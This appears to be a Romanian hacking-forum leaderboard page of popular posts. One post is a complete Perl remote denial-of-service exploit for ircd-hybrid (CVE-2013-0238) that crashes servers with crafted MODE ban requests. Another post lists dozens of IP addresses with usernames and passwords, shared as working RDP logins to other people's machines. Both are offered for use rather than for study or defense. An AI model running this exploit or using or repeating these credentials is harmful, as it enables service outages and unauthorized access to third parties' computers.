Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 04/13/13 in Posts

  1. Pana nu-ti cumperi si tu o placa wireless pe usb, Alfa awus036h 1w ,o sa o freci in gol... Dar , lasa ,ca pentru antrenament e bine. Macar te familiarizezi cu toate distributiile si cu toate aplicatiile.
    1 point
  2. #!/usr/bin/perl # ircd-hybrid remote denial of service exploit for CVE-2013-0238 # quick and dirty h4x by kingcope # tested against ircd-hybrid-8.0.5 centos6 # please modify below in case of buggy code. # enjoy! use Socket; srand(time()); $exploiting_nick = "hybExpl" . int(rand(10000)); sub connecttoserver() { $bool = "yes"; $iaddr = inet_aton($ircserver) || die("Failed to find host: $ircserver"); $paddr = sockaddr_in($ircport, $iaddr); $proto = getprotobyname('tcp'); socket(SOCK1, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket:$!"); connect(SOCK1, $paddr) || {$bool = "no"}; } sub usage() { print "usage: ircd-hybrid.pl <target> <port>\r\n"; exit; } $| = 1; print "----------------------------------------------------------------------\r\nLets have fun!\r\n"; print "----------------------------------------------------------------------\r\n"; if (!defined($ARGV[1])) { usage(); } $ircport = $ARGV[1]; $ircserver = $ARGV[0]; print "Connecting to $ircserver on port $ircport...\n"; connecttoserver(); if ($bool eq "no") { print "Connection refused.\r\n"; exit(0); } send(SOCK1,"NICK $exploiting_nick\r\n",0); send(SOCK1,"USER $exploiting_nick \"yahoo.com\" \"eu.hax.net\" :$exploiting_nick\r\n",0); while (<SOCK1>) { $line = $_; print $line; if ((index $line, " 005 ") ne -1) { goto logged_in; } if ((index $line, "PING") ne -1) { substr($line,1,1,"O"); send(SOCK1, $line, 0); } } logged_in: print " ok\r\n"; print "Sending buffers...\r\n"; $channelr = int(rand(10000)); send(SOCK1, "JOIN #h4xchan$channelr\r\n", 0); sleep(1); $k = 0; do { print $_; $k++; $crashnum = -1000009 - $k * 1000; send(SOCK1, "MODE #h4xchan$channelr +b *!*\@127.0.0.1/$crashnum\r\n", 0); } while(<SOCK1>); print "done\r\n"; # EOF
    1 point
  3. Hai sa va dau si eu cateva rdp-uri,nu sunt ale mele sunt copy paste ,dar probate cu DuChecker asa ca sunt valabile. Cum nu sunt cu drept de admin,nu am ce face. 209.2.45.10@ftp;password 205.232.14.102@xerox;xerox 205.197.32.14@alpha;alpha 204.133.174.2@tech;tech 199.245.145.94@house;house 199.245.145.93@house;house 199.245.145.90@house;house 199.19.133.59@aurora;aurora 173.221.106.84@canon;canon 173.200.196.46@Davide;Davide;Success 173.200.56.2@dispatch;dispatch 173.161.194.202@chris;chris 173.68.146.52@anne;anne 173.15.178.173@arlene;arlene 139.55.223.205@rick;rick 98.255.208.153@dakota;dakota;Success 96.57.169.150@cad;cad 96.57.57.194@training;training 96.57.6.42@student;student 96.56.9.179@eric;eric1 96.46.70.3@cristina;password 96.11.254.119@coke;coke123 96.11.254.116@coke;coke123 96.11.243.245@beth;Password1 96.10.4.14@judy;judy 76.195.252.190@temp;temp;Success 76.72.91.84@toshiba;toshiba 75.77.200.182@sales;password 74.218.237.26@kyle;kyle01 72.54.204.170@info;info 72.45.174.146@jackie;jackie 71.201.162.131@shop;password 71.9.156.30@dispatch;dispatch 70.250.165.230@test;test123 70.88.239.5@xerox;xerox1 70.88.143.141@lauren;lauren123 68.168.88.65@canon;canon 67.152.243.194@lab;lab 67.135.46.114@scanner;scanner 66.251.20.178@training;training 66.218.179.194@testuser;testuser 64.133.140.67@Eli;eli 64.112.193.84@Addison;Addison 64.94.232.35@shaun;shaun 209.252.139.131@clock;clock1 209.117.57.165@data;data 208.38.227.91@lab;lab 209.124.166.178@scanner;scanner 209.65.66.128@accounting;accounting 207.59.115.138@station;station 209.34.113.123@library;library 66.117.204.165@Laura;password 206.248.229.122@template;12345 204.246.251.149@master;master 208.90.160.229@carlos;carlos1 212.57.247.154@user1; 78.186.137.70@user1;123456 31.134.209.9@manager;1 219.95.97.57@test;1234 64.179.52.250@bonnie;bonnie 200.158.211.197@admin;1234 219.64.197.207@test;test 165.228.221.23@manager;manager 70.89.114.41@user;user 70.164.63.251@ryan;ryan123 207.114.189.122@anita;anita
    -1 points
×
×
  • Create New...